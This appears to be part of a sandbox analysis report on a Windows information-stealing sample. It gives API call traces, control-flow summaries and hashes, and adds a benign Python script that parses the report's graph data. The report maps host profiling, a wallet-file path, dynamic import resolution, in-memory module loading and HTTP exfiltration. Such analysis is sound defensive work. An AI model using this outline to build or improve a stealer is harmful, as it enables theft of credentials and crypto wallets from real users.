• Host profiling in the function spanning 551a26 to 552699, each result appended to one buffer through 55a9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat) and 55a8a0/55a920: 557500 GetVolumeInformationA, GetProcessHeap/RtlAllocateHeap, wsprintfA; 557690 two RegOpenKeyExA/RegQueryValueExA/RegCloseKey reads (the first via 557720); 5577c0 GetCurrentProcess/IsWow64Process; 557850 and 5578e0 (3 API calls each); 557980 GetLocalTime/wsprintfA; 557a30 GetTimeZoneInformation/wsprintfA; 557b00 GetUserDefaultLocaleName (558d20 LocalAlloc/CharToOemW); 557b90 GetKeyboardLayoutList x2, a GetLocaleInfoA loop, LocalFree; 557d80 GetSystemPowerStatus; 55207e GetCurrentProcessId then 559470 OpenProcess/GetModuleFileNameExA/CloseHandle; 557e00 RegOpenKeyExA/RegQueryValueExA/RegCloseKey; 557f60 GetLogicalProcessorInformationEx/GetLastError in a retry loop with 558a10 RtlAllocateHeap and 5589f0 HeapFree, then wsprintfA; 557ed0 GetSystemInfo/wsprintfA; 558100 GlobalMemoryStatusEx/wsprintfA; 5587c0 RtlAllocateHeap/wsprintfA; 5581f0 string building; 558320 RegOpenKeyExA, a RegEnumKeyExA loop doing wsprintfA, RegOpenKeyExA, RegQueryValueExA x2 and lstrlen per subkey, RegCloseKey (17 API calls); 558680 CreateToolhelp32Snapshot/Process32First, a Process32Next loop, CloseHandle. After lstrlen at 55265a the buffer is handed to 555190 -> 545100, which calls 558ea0 twice (CryptBinaryToStringA size query, GetProcessHeap/RtlAllocateHeap, CryptBinaryToStringA) and then sends through the InternetOpenA (5451fd) / InternetConnectA (545329) / HttpOpenRequestA (545359) sequence.
• Download at 545009: InternetOpenUrlA, InternetReadFile loop (54502a), InternetCloseHandle x2 (5450a0).
• 5498d0 -> 549880 -> 546fb0 -> 546d40: 546530 allocates with 558a10 RtlAllocateHeap and VirtualAlloc (54668f, 546743); 5469b0 loops over LoadLibraryA (546a09) and GetProcAddress (546ba8); teardown is VirtualFree (546ee6), FreeLibrary (546f26) and 5589f0 HeapFree. The VirtualAlloc -> LoadLibraryA/GetProcAddress -> VirtualFree/FreeLibrary shape is what an in-memory module loader that resolves a mapped image's imports looks like; its result feeds the StrCmpCA chain at 550759 and 550250/54fb00.
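The graph-widget data for this sample (node id, basic-block address, APIs called in the block, src->dst edges) is what the report exposes as text, and walking it by hand is slow. As an added example that is not part of the Joe Sandbox report, the following Python parses that token format, lists the API-calling blocks reachable from a node in address order, and finds the comparison that gates a given call (here the StrCmpCA in front of ExitProcess at 5517cf). The sample input is constructed from this report's own node labels and addresses, with the lstrcpy/lstrcat string-building blocks between them collapsed and three shortcut edges added to keep it connected.

```python
"""Recover the API-call skeleton of a function from a Joe Sandbox
control-flow-graph edge dump (the text behind the report's graph widget).

Token stream format:
  node definition:  <node-id> <hex-block-address> [label tokens ...]
  edge:             <src-id>-><dst-id>
Label tokens are the APIs called in that basic block or a callee summary
such as "2 API calls" / "ctype"; a block with no label calls nothing.
"""
import re
from collections import defaultdict

NODE_ID = re.compile(r"^\d+$")
BLOCK_ADDR = re.compile(r"^[0-9a-f]{4,8}$")   # addresses are lowercase hex in the dump
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(text):
    """Return (nodes, succ): nodes[id] = (address, label), succ[id] = [successor ids]."""
    tokens = text.split()
    addr, labels, succ = {}, defaultdict(list), defaultdict(list)
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            succ[edge.group(1)].append(edge.group(2))
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        # A node definition is a decimal id followed by a hex address; a bare
        # number inside a label ("4 API calls") is followed by a word instead.
        if NODE_ID.match(tok) and BLOCK_ADDR.match(nxt):
            current = tok
            addr[current] = nxt
            i += 2
            continue
        if current is not None:
            labels[current].append(tok)
        i += 1
    return {n: (a, " ".join(labels[n])) for n, a in addr.items()}, succ


def reachable(succ, start):
    """Node ids reachable from `start` along src->dst edges (iterative DFS)."""
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        stack.extend(succ.get(n, []))
    return seen


def api_blocks(nodes, succ, start):
    """Reachable blocks that call at least one API, ordered by block address.
    Address order approximates source order inside one function, so the result
    reads as the function's API skeleton without enumerating paths."""
    hits = [nodes[n] for n in reachable(succ, start) if n in nodes and nodes[n][1]]
    return sorted(hits, key=lambda t: int(t[0], 16))


def gates(nodes, succ, api):
    """For every block calling `api`, the (address, label) of the blocks branching into it.
    Finds the comparison that sits in front of a sensitive call such as ExitProcess."""
    pred = defaultdict(list)
    for src, dsts in succ.items():
        for dst in dsts:
            pred[dst].append(src)
    return {a: [nodes[p] for p in pred[n] if p in nodes]
            for n, (a, label) in nodes.items() if api in label.split()}


# Constructed sample: labels and addresses from the report's dump, string-building
# blocks collapsed; 15706->14703, 14705->14781 and 14783->14707 are shortcut edges.
SAMPLE = """
14657 55a740 lstrcpy 14656->14657
14658 54490b InternetOpenA StrCmpCA 14657->14658
14659 544944 14658->14659
14660 544ecb InternetCloseHandle 14659->14660
15702 558b60 14659->15702
15706 558b82 GetSystemTime 15702->15706
14703 544a8d 15706->14703
14704 544aa3 InternetConnectA 14703->14704 14704->14660
14705 544ad3 HttpOpenRequestA 14704->14705
14707 544ebe InternetCloseHandle 14705->14707 14707->14660
14781 544e13 HttpSendRequestA 14705->14781
14782 544e32 InternetReadFile 14781->14782
14783 544e67 InternetCloseHandle 14782->14783 14783->14707
14788 544e5e 14782->14788 14788->14782 14788->14783
14791 5517c4 StrCmpCA
14792 5517d7 14791->14792
14793 5517cf ExitProcess 14791->14793
"""

if __name__ == "__main__":
    nodes, succ = parse_cfg(SAMPLE)
    for address, label in api_blocks(nodes, succ, "14657"):
        print(address, label)
    print(gates(nodes, succ, "ExitProcess"))
```

Feed it the full dump for one root node and the WinINet sequence (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle) falls out in address order; `gates` is the quick way to confirm that a StrCmpCA result, not an unconditional path, decides whether the sample exits.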

                      Control-flow Graph

control_flow_graph for 559860 (block ranges and call counts recovered from the graph data): 559860-559874 calls 559750; 55987a-559a8e calls 559780 and then GetProcAddress 21 times; 559a93-559af2 calls LoadLibraryA 5 times. After that come five conditionally executed blocks, each guarded by a branch (at the end of 559af2 and at 559b0d, 559b46, 559b68, 559b89, the shape of a NULL check on a LoadLibraryA result): 559af4-559b08 GetProcAddress x1, 559b16-559b41 x2, 559b4f-559b63 x1, 559b71-559b84 x1, 559b92-559bbc x2, matching the seven post-LoadLibraryA GetProcAddress calls on five distinct handles in the APIs list below. The function ends at 559bc1.
                      APIs
                      • GetProcAddress.KERNEL32(76210000,01021680), ref: 005598A1
                      • GetProcAddress.KERNEL32(76210000,01021710), ref: 005598BA
                      • GetProcAddress.KERNEL32(76210000,01021698), ref: 005598D2
                      • GetProcAddress.KERNEL32(76210000,01021770), ref: 005598EA
                      • GetProcAddress.KERNEL32(76210000,01021788), ref: 00559903
                      • GetProcAddress.KERNEL32(76210000,01028928), ref: 0055991B
                      • GetProcAddress.KERNEL32(76210000,010154E8), ref: 00559933
                      • GetProcAddress.KERNEL32(76210000,01015448), ref: 0055994C
                      • GetProcAddress.KERNEL32(76210000,010217A0), ref: 00559964
                      • GetProcAddress.KERNEL32(76210000,01021518), ref: 0055997C
                      • GetProcAddress.KERNEL32(76210000,010216B0), ref: 00559995
                      • GetProcAddress.KERNEL32(76210000,01021530), ref: 005599AD
                      • GetProcAddress.KERNEL32(76210000,010156C8), ref: 005599C5
                      • GetProcAddress.KERNEL32(76210000,01021548), ref: 005599DE
                      • GetProcAddress.KERNEL32(76210000,010215D8), ref: 005599F6
                      • GetProcAddress.KERNEL32(76210000,010156E8), ref: 00559A0E
                      • GetProcAddress.KERNEL32(76210000,01021638), ref: 00559A27
                      • GetProcAddress.KERNEL32(76210000,01021650), ref: 00559A3F
                      • GetProcAddress.KERNEL32(76210000,01015468), ref: 00559A57
                      • GetProcAddress.KERNEL32(76210000,01021800), ref: 00559A70
                      • GetProcAddress.KERNEL32(76210000,01015688), ref: 00559A88
                      • LoadLibraryA.KERNEL32(010217E8,?,00556A00), ref: 00559A9A
                      • LoadLibraryA.KERNEL32(01021818,?,00556A00), ref: 00559AAB
                      • LoadLibraryA.KERNEL32(01021878,?,00556A00), ref: 00559ABD
                      • LoadLibraryA.KERNEL32(01021830,?,00556A00), ref: 00559ACF
                      • LoadLibraryA.KERNEL32(010218A8,?,00556A00), ref: 00559AE0
                      • GetProcAddress.KERNEL32(75B30000,01021848), ref: 00559B02
                      • GetProcAddress.KERNEL32(751E0000,01021860), ref: 00559B23
                      • GetProcAddress.KERNEL32(751E0000,01021890), ref: 00559B3B
                      • GetProcAddress.KERNEL32(76910000,01028D10), ref: 00559B5D
                      • GetProcAddress.KERNEL32(75670000,01015488), ref: 00559B7E
                      • GetProcAddress.KERNEL32(77310000,01028A18), ref: 00559B9F
                      • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00559BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00559BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                      • Instruction ID: 20cf7de71441e090b42239d53a9037580b2980235055d27f3fc788ab4f19a7f6
                      • Opcode Fuzzy Hash: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                      • Instruction Fuzzy Hash: CAA16BB5580240BFF345EFA8ED889563BF9F79C701734C51BA605C3224D63DA852EB2A

                      Control-flow Graph (function at 5445c0)
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0054460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0054479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445C7, 005445D2, 005445DD, 005445E8, 005445F3, 00544617, 00544622, 0054462D, 00544638, 00544643, 00544657, 00544662, 0054466D, 00544678, 00544683, 005446AC, 005446B7, 005446C2, 005446CD, 005446D8, 00544713, 0054471E, 00544729, 00544734, 0054473F, 0054474F, 0054475A, 00544765, 00544770, 0054477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: 3f09200a3ee34a8e79988b174ca283ea1fd86a99e7da6ac550120746403fcb0b
                      • Instruction ID: 85490bd7d5d68210543cab87745683d32569966229efbadf2b13beb311b5ad3c
                      • Opcode Fuzzy Hash: 3f09200a3ee34a8e79988b174ca283ea1fd86a99e7da6ac550120746403fcb0b
                      • Instruction Fuzzy Hash: 5C4108717CA70C7AE666BFA48842E9D7F66FF4270CF919640EA4953380DBB07520853A

                      Control-flow Graph (function at 544880)
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00544915
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 0054493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00544ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00560DDB,00000000,?,?,00000000,?,",00000000,?,0102FD20), ref: 00544DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00544E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00544E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00544E49
                      • InternetCloseHandle.WININET(00000000), ref: 00544EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00544EC5
                      • HttpOpenRequestA.WININET(00000000,0102FC40,?,0102F320,00000000,00000000,00400100,00000000), ref: 00544B15
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • InternetCloseHandle.WININET(00000000), ref: 00544ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                      • Instruction ID: 11bfdefe5bde5ff7d9ebae7526ccd04d132c2cd9998d10409d069d06a633ba0d
                      • Opcode Fuzzy Hash: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                      • Instruction Fuzzy Hash: 83120F72910119AADB15EB90DC66FEEBB38BF94301F50429AB50663091EF702F4DCF66
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                      • Instruction ID: 2c4d2b98053619506c1266ad9c209b0f1d8a9943a6f3c67b784837e2a1d16652
                      • Opcode Fuzzy Hash: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                      • Instruction Fuzzy Hash: 0BF04FB2944208ABDB10DF98DD49BAEBBB8FB08721F10465AFA05A2680C77815048BA1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                      • Instruction ID: 866bd86557b26f156826fc20dd0e5d3d36d6d3039ae17df4f0d0e268f7677cd0
                      • Opcode Fuzzy Hash: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                      • Instruction Fuzzy Hash: 02D05E7494030CEBDB00DFE0D8496DDBB78FB08315F101555D90562340EA345481CBAA

                      Control-flow Graph
                      (graph of the function at 00559C10; rendering omitted, legend: Executed / Not Executed; the API calls on its paths are listed under APIs below)
                      APIs
                      • GetProcAddress.KERNEL32(76210000,01015408), ref: 00559C2D
                      • GetProcAddress.KERNEL32(76210000,01015528), ref: 00559C45
                      • GetProcAddress.KERNEL32(76210000,01028FE0), ref: 00559C5E
                      • GetProcAddress.KERNEL32(76210000,01028FF8), ref: 00559C76
                      • GetProcAddress.KERNEL32(76210000,01029010), ref: 00559C8E
                      • GetProcAddress.KERNEL32(76210000,0102DF28), ref: 00559CA7
                      • GetProcAddress.KERNEL32(76210000,0101A5B8), ref: 00559CBF
                      • GetProcAddress.KERNEL32(76210000,0102DE08), ref: 00559CD7
                      • GetProcAddress.KERNEL32(76210000,0102DEF8), ref: 00559CF0
                      • GetProcAddress.KERNEL32(76210000,0102DDF0), ref: 00559D08
                      • GetProcAddress.KERNEL32(76210000,0102DE38), ref: 00559D20
                      • GetProcAddress.KERNEL32(76210000,010156A8), ref: 00559D39
                      • GetProcAddress.KERNEL32(76210000,01015568), ref: 00559D51
                      • GetProcAddress.KERNEL32(76210000,010155A8), ref: 00559D69
                      • GetProcAddress.KERNEL32(76210000,010155C8), ref: 00559D82
                      • GetProcAddress.KERNEL32(76210000,0102DE20), ref: 00559D9A
                      • GetProcAddress.KERNEL32(76210000,0102DE50), ref: 00559DB2
                      • GetProcAddress.KERNEL32(76210000,0101A658), ref: 00559DCB
                      • GetProcAddress.KERNEL32(76210000,01015668), ref: 00559DE3
                      • GetProcAddress.KERNEL32(76210000,0102DE68), ref: 00559DFB
                      • GetProcAddress.KERNEL32(76210000,0102DF40), ref: 00559E14
                      • GetProcAddress.KERNEL32(76210000,0102DE80), ref: 00559E2C
                      • GetProcAddress.KERNEL32(76210000,0102DF10), ref: 00559E44
                      • GetProcAddress.KERNEL32(76210000,01015588), ref: 00559E5D
                      • GetProcAddress.KERNEL32(76210000,0102DE98), ref: 00559E75
                      • GetProcAddress.KERNEL32(76210000,0102DDD8), ref: 00559E8D
                      • GetProcAddress.KERNEL32(76210000,0102DDC0), ref: 00559EA6
                      • GetProcAddress.KERNEL32(76210000,0102DEB0), ref: 00559EBE
                      • GetProcAddress.KERNEL32(76210000,0102DEC8), ref: 00559ED6
                      • GetProcAddress.KERNEL32(76210000,0102DF58), ref: 00559EEF
                      • GetProcAddress.KERNEL32(76210000,0102DEE0), ref: 00559F07
                      • GetProcAddress.KERNEL32(76210000,0102DF70), ref: 00559F1F
                      • GetProcAddress.KERNEL32(76210000,0102D9D0), ref: 00559F38
                      • GetProcAddress.KERNEL32(76210000,0101F7D8), ref: 00559F50
                      • GetProcAddress.KERNEL32(76210000,0102DA00), ref: 00559F68
                      • GetProcAddress.KERNEL32(76210000,0102D9A0), ref: 00559F81
                      • GetProcAddress.KERNEL32(76210000,010153C8), ref: 00559F99
                      • GetProcAddress.KERNEL32(76210000,0102D7F0), ref: 00559FB1
                      • GetProcAddress.KERNEL32(76210000,01015608), ref: 00559FCA
                      • GetProcAddress.KERNEL32(76210000,0102D958), ref: 00559FE2
                      • GetProcAddress.KERNEL32(76210000,0102D9B8), ref: 00559FFA
                      • GetProcAddress.KERNEL32(76210000,01015628), ref: 0055A013
                      • GetProcAddress.KERNEL32(76210000,01015648), ref: 0055A02B
                      • LoadLibraryA.KERNEL32(0102D7C0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A03D
                      • LoadLibraryA.KERNEL32(0102D9E8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A04E
                      • LoadLibraryA.KERNEL32(0102D928,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A060
                      • LoadLibraryA.KERNEL32(0102D7D8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A072
                      • LoadLibraryA.KERNEL32(0102D988,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A083
                      • LoadLibraryA.KERNEL32(0102D808,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A095
                      • LoadLibraryA.KERNEL32(0102DA18,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0A7
                      • LoadLibraryA.KERNEL32(0102D820,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0B8
                      • GetProcAddress.KERNEL32(751E0000,010152E8), ref: 0055A0DA
                      • GetProcAddress.KERNEL32(751E0000,0102DA60), ref: 0055A0F2
                      • GetProcAddress.KERNEL32(751E0000,010289D8), ref: 0055A10A
                      • GetProcAddress.KERNEL32(751E0000,0102DA30), ref: 0055A123
                      • GetProcAddress.KERNEL32(751E0000,01015328), ref: 0055A13B
                      • GetProcAddress.KERNEL32(70250000,0101A7E8), ref: 0055A160
                      • GetProcAddress.KERNEL32(70250000,01014F68), ref: 0055A179
                      • GetProcAddress.KERNEL32(70250000,0101A680), ref: 0055A191
                      • GetProcAddress.KERNEL32(70250000,0102D970), ref: 0055A1A9
                      • GetProcAddress.KERNEL32(70250000,0102D850), ref: 0055A1C2
                      • GetProcAddress.KERNEL32(70250000,01014FA8), ref: 0055A1DA
                      • GetProcAddress.KERNEL32(70250000,01014FE8), ref: 0055A1F2
                      • GetProcAddress.KERNEL32(70250000,0102D838), ref: 0055A20B
                      • GetProcAddress.KERNEL32(753A0000,010150E8), ref: 0055A22C
                      • GetProcAddress.KERNEL32(753A0000,01015308), ref: 0055A244
                      • GetProcAddress.KERNEL32(753A0000,0102D8F8), ref: 0055A25D
                      • GetProcAddress.KERNEL32(753A0000,0102DA48), ref: 0055A275
                      • GetProcAddress.KERNEL32(753A0000,01015208), ref: 0055A28D
                      • GetProcAddress.KERNEL32(76310000,0101A6D0), ref: 0055A2B3
                      • GetProcAddress.KERNEL32(76310000,0101A478), ref: 0055A2CB
                      • GetProcAddress.KERNEL32(76310000,0102DA78), ref: 0055A2E3
                      • GetProcAddress.KERNEL32(76310000,01015048), ref: 0055A2FC
                      • GetProcAddress.KERNEL32(76310000,01014F48), ref: 0055A314
                      • GetProcAddress.KERNEL32(76310000,0101A568), ref: 0055A32C
                      • GetProcAddress.KERNEL32(76910000,0102D880), ref: 0055A352
                      • GetProcAddress.KERNEL32(76910000,010150A8), ref: 0055A36A
                      • GetProcAddress.KERNEL32(76910000,01028A48), ref: 0055A382
                      • GetProcAddress.KERNEL32(76910000,0102DA90), ref: 0055A39B
                      • GetProcAddress.KERNEL32(76910000,0102D898), ref: 0055A3B3
                      • GetProcAddress.KERNEL32(76910000,01015288), ref: 0055A3CB
                      • GetProcAddress.KERNEL32(76910000,01015188), ref: 0055A3E4
                      • GetProcAddress.KERNEL32(76910000,0102DAA8), ref: 0055A3FC
                      • GetProcAddress.KERNEL32(76910000,0102D8B0), ref: 0055A414
                      • GetProcAddress.KERNEL32(75B30000,010152A8), ref: 0055A436
                      • GetProcAddress.KERNEL32(75B30000,0102D8C8), ref: 0055A44E
                      • GetProcAddress.KERNEL32(75B30000,0102D868), ref: 0055A466
                      • GetProcAddress.KERNEL32(75B30000,0102D8E0), ref: 0055A47F
                      • GetProcAddress.KERNEL32(75B30000,0102D910), ref: 0055A497
                      • GetProcAddress.KERNEL32(75670000,010151A8), ref: 0055A4B8
                      • GetProcAddress.KERNEL32(75670000,010152C8), ref: 0055A4D1
                      • GetProcAddress.KERNEL32(76AC0000,01014FC8), ref: 0055A4F2
                      • GetProcAddress.KERNEL32(76AC0000,0102D940), ref: 0055A50A
                      • GetProcAddress.KERNEL32(6F4E0000,01015088), ref: 0055A530
                      • GetProcAddress.KERNEL32(6F4E0000,01015228), ref: 0055A548
                      • GetProcAddress.KERNEL32(6F4E0000,01014F88), ref: 0055A560
                      • GetProcAddress.KERNEL32(6F4E0000,0102DD00), ref: 0055A579
                      • GetProcAddress.KERNEL32(6F4E0000,01015168), ref: 0055A591
                      • GetProcAddress.KERNEL32(6F4E0000,010151C8), ref: 0055A5A9
                      • GetProcAddress.KERNEL32(6F4E0000,010151E8), ref: 0055A5C2
                      • GetProcAddress.KERNEL32(6F4E0000,01015008), ref: 0055A5DA
                      • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0055A5F1
                      • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0055A607
                      • GetProcAddress.KERNEL32(75AE0000,0102DD78), ref: 0055A629
                      • GetProcAddress.KERNEL32(75AE0000,01028A98), ref: 0055A641
                      • GetProcAddress.KERNEL32(75AE0000,0102DCA0), ref: 0055A659
                      • GetProcAddress.KERNEL32(75AE0000,0102DC10), ref: 0055A672
                      • GetProcAddress.KERNEL32(76300000,01015028), ref: 0055A693
                      • GetProcAddress.KERNEL32(6E9F0000,0102DC28), ref: 0055A6B4
                      • GetProcAddress.KERNEL32(6E9F0000,01015248), ref: 0055A6CD
                      • GetProcAddress.KERNEL32(6E9F0000,0102DC40), ref: 0055A6E5
                      • GetProcAddress.KERNEL32(6E9F0000,0102DB98), ref: 0055A6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                      • Instruction ID: 8c2bd1f46042af4331dff5695dd1bf9af67209197da10ad2c688805e08b5f95d
                      • Opcode Fuzzy Hash: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                      • Instruction Fuzzy Hash: 4F623DB5680200BFF745DFA8ED889563BF9F79C701734C51BA609C3224D63DA452EB2A

                      Control-flow Graph
                      (graph of the function at 00546280; rendering omitted, legend: Executed / Not Executed; the API calls on its paths are listed under APIs below)
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005463FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054646D
                      • InternetCloseHandle.WININET(00000000), ref: 005464EF
                      • InternetCloseHandle.WININET(00000000), ref: 005464F9
                      • InternetCloseHandle.WININET(00000000), ref: 00546503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
